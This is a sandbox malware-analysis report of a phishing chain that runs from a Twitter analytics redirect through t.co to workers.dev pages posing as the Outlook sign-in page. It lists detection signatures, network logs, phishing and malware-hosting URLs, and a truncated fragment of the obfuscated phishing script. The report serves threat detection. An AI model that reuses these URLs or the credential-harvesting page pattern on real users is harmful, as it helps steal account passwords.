Edit tour

Windows Analysis Report
https://analytics.twitter.com/mob_idsync_click?slug=MnH3QFlxCF&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_

Overview

General Information

Sample URL:	https://analytics.twitter.com/mob_idsync_click?slug=MnH3QFlxCF&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn3
Analysis ID:	1389674
Infos:

Detection

HTMLPhisher

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Phishing site detected (based on favicon image match)

Yara detected HtmlPhish10

Yara detected HtmlPhish44

Yara detected HtmlPhish45

Yara detected HtmlPhish54

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

Creates files inside the system directory

Found iframes

HTML body contains low number of good links

HTML page contains hidden URLs or javascript code

HTML title does not match URL

Classification

Process Tree

System is w10x64

chrome.exe (PID: 6184 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 5792 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=1972,i,12317150299343217891,15753523565498466481,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 1880 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://analytics.twitter.com/mob_idsync_click?slug=MnH3QFlxCF&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&ad_tracking=true&tailored_ads=true MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_128	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

HTML

Source	Rule	Description	Author
1.1.pages.csv	JoeSecurity_HtmlPhish_45	Yara detected HtmlPhish_45	Joe Security
1.2.pages.csv	JoeSecurity_HtmlPhish_45	Yara detected HtmlPhish_45	Joe Security
1.2.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
2.3.pages.csv	JoeSecurity_HtmlPhish_45	Yara detected HtmlPhish_45	Joe Security
2.3.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
3.4.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
3.10.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
3.14.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
5.6.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
5.9.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
Click to see the 5 entries

Joe Sandbox Signatures

• AV Detection
• Phishing
• Compliance
• Networking
• System Summary

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://analytics.twitter.com/mob_idsync_click?slug=MnH3QFlxCF&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&ad_tracking=true&tailored_ads=true

SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social usering

Antivirus detection for URL or domain

Source: https://smsmail.net/re/65ba6b45a7471c8dd3b9f0fd	Avira URL Cloud: Label: phishing
Source: https://rkugxtvgxusbsfrtcv.kute.pw/65ba6b50a7471c8dd3b9f0fe-65ba6b45a7471c8dd3b9f0fd.js	Avira URL Cloud: Label: malware
Source: https://khanmotiozpisx.ellieb7.workers.dev/	Avira URL Cloud: Label: phishing
Source: https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: smsmail.net	Virustotal: Detection: 12%	Perma Link
Source: khanmotiozpisx.ellieb7.workers.dev	Virustotal: Detection: 7%	Perma Link
Source: https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx	Virustotal: Detection: 8%	Perma Link

Phishing

Phishing site detected (based on favicon image match)

Source: https://pixiepowder00.workers.dev	Matcher: Template: microsoft matched with high similarity
Source: https://ellieb7.workers.dev	Matcher: Template: microsoft matched with high similarity
Source: https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx#/ld-Qoahakabzgvzjxn	Matcher: Template: microsoft matched with high similarity
Source: https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx#/ld-SILENTCODERSEMAIL	Matcher: Template: microsoft matched with high similarity
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP?sso_reload=true	Matcher: Template: microsoft matched with high similarity
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/PQ1Sgkxel	Matcher: Template: microsoft matched with high similarity

Yara detected HtmlPhish10

Source: Yara match	File source: 1.2.pages.csv, type: HTML
Source: Yara match	File source: 2.3.pages.csv, type: HTML

Yara detected HtmlPhish44

Source: Yara match

File source: dropped/chromecache_128, type: DROPPED

Yara detected HtmlPhish45

Source: Yara match	File source: 1.1.pages.csv, type: HTML
Source: Yara match	File source: 1.2.pages.csv, type: HTML
Source: Yara match	File source: 2.3.pages.csv, type: HTML

Yara detected HtmlPhish54

Source: Yara match	File source: 3.4.pages.csv, type: HTML
Source: Yara match	File source: 3.10.pages.csv, type: HTML
Source: Yara match	File source: 3.14.pages.csv, type: HTML
Source: Yara match	File source: 5.6.pages.csv, type: HTML
Source: Yara match	File source: 5.9.pages.csv, type: HTML

Phishing site detected (based on image similarity)

Source: https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx#/ld-Qoahakabzgvzjxn

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site detected (based on logo match)

Source: https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx#/ld-Qoahakabzgvzjxn	Matcher: Template: microsoft matched
Source: https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx#/ld-SILENTCODERSEMAIL	Matcher: Template: microsoft matched
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/PQ1Sgkxel	Matcher: Template: microsoft matched
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/PQ1Sgkxel	Matcher: Template: microsoft matched

Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP?sso_reload=true	HTTP Parser: Iframe src: https://outlook.office365.com/owa/prefetch.aspx
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP?sso_reload=true	HTTP Parser: Iframe src: https://outlook.office365.com/owa/prefetch.aspx
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP?sso_reload=true	HTTP Parser: Iframe src: https://outlook.office365.com/owa/prefetch.aspx
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/PQ1Sgkxel	HTTP Parser: Iframe src: https://outlook.office365.com/owa/prefetch.aspx
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/PQ1Sgkxel	HTTP Parser: Iframe src: https://outlook.office365.com/owa/prefetch.aspx

Source: https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx#/ld-Qoahakabzgvzjxn	HTTP Parser: Number of links: 0
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP?sso_reload=true	HTTP Parser: Number of links: 1
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/PQ1Sgkxel	HTTP Parser: Number of links: 1

Source: https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx#/ld-Qoahakabzgvzjxn

HTTP Parser: Base64 decoded: <script>var ue=["Aw5PDa==","y291BNrLCG==","y3jLyxrLrwXLBwu=","y2fSBa==","xcTCkYaQkd86w2e=","mvzrAeLJBNnmsK4=","yMLUza==","DY82nwjHnMi1mge=","CNrJDI5RDxrLlNa=","yMjYzt0=","rhbYt3CHqcy=","C3rYAw5N","ChjVDg90ExbL","yxbWBhK=","zJbMzs02nwjHnMi=","p2jICMu9q3jQu...

Source: https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx#/ld-Qoahakabzgvzjxn	HTTP Parser: Title: does not match URL
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP?sso_reload=true	HTTP Parser: Title: Sign in to Outlook does not match URL
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/PQ1Sgkxel	HTTP Parser: Title: Sign in to Outlook does not match URL

Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP?sso_reload=true	HTTP Parser: <input type="password" .../> found
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/PQ1Sgkxel	HTTP Parser: <input type="password" .../> found

Source: https://analytics.twitter.com/mob_idsync_click?slug=MnH3QFlxCF&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&ad_tracking=true&tailored_ads=true	HTTP Parser: No favicon
Source: https://outlook.office365.com/owa/prefetch.aspx	HTTP Parser: No favicon
Source: https://outlook.office365.com/owa/prefetch.aspx	HTTP Parser: No favicon

Source: https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx#/ld-Qoahakabzgvzjxn	HTTP Parser: No <meta name="author".. found
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP?sso_reload=true	HTTP Parser: No <meta name="author".. found
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP?sso_reload=true	HTTP Parser: No <meta name="author".. found
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP?sso_reload=true	HTTP Parser: No <meta name="author".. found
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/PQ1Sgkxel	HTTP Parser: No <meta name="author".. found
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/PQ1Sgkxel	HTTP Parser: No <meta name="author".. found

Source: https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx#/ld-Qoahakabzgvzjxn	HTTP Parser: No <meta name="copyright".. found
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP?sso_reload=true	HTTP Parser: No <meta name="copyright".. found
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP?sso_reload=true	HTTP Parser: No <meta name="copyright".. found
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP?sso_reload=true	HTTP Parser: No <meta name="copyright".. found
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/PQ1Sgkxel	HTTP Parser: No <meta name="copyright".. found
Source: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/PQ1Sgkxel	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 23.220.189.216:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.220.189.216:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49698 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.134&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.134Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /mob_idsync_click?slug=MnH3QFlxCF&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&ad_tracking=true&tailored_ads=true HTTP/1.1Host: analytics.twitter.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pixel?google_nid=twitter_dbm&google_redir=https://analytics.twitter.com/tpm&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&google_hm=N2RiMDQ0NGQwOTFhMmFmZjQ4ODY1MGQxMWZhZjViYTU0Y2ExM2I1YmY2NDFkNWE2ODJlNmI0Yzk1YmY1YmVkNg== HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pixel?google_nid=twitter_dbm&google_redir=https://analytics.twitter.com/tpm&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&google_hm=N2RiMDQ0NGQwOTFhMmFmZjQ4ODY1MGQxMWZhZjViYTU0Y2ExM2I1YmY2NDFkNWE2ODJlNmI0Yzk1YmY1YmVkNg==&google_tc= HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global traffic	HTTP traffic detected: GET /tpm?idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg HTTP/1.1Host: analytics.twitter.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest_id=v1%3A170747337641474796
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: analytics.twitter.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest_id=v1%3A170747337641474796
Source: global traffic	HTTP traffic detected: GET /MnH3QFlxCF HTTP/1.1Host: t.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?bbre=CrjRQgGBVdEMWTyZx HTTP/1.1Host: khanmotiozpisx.ellieb7.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://t.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: analytics.twitter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest_id=v1%3A170747337641474796
Source: global traffic	HTTP traffic detected: GET /65ba6b50a7471c8dd3b9f0fe-65ba6b45a7471c8dd3b9f0fd.js HTTP/1.1Host: rkugxtvgxusbsfrtcv.kute.pwConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /sdxhetfdzzdsdsdxz/themes/css/0e80cb422a1f2a979e32fc3f0a9ed189nbr1706715983.css HTTP/1.1Host: rullbullpullpushcndapp.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
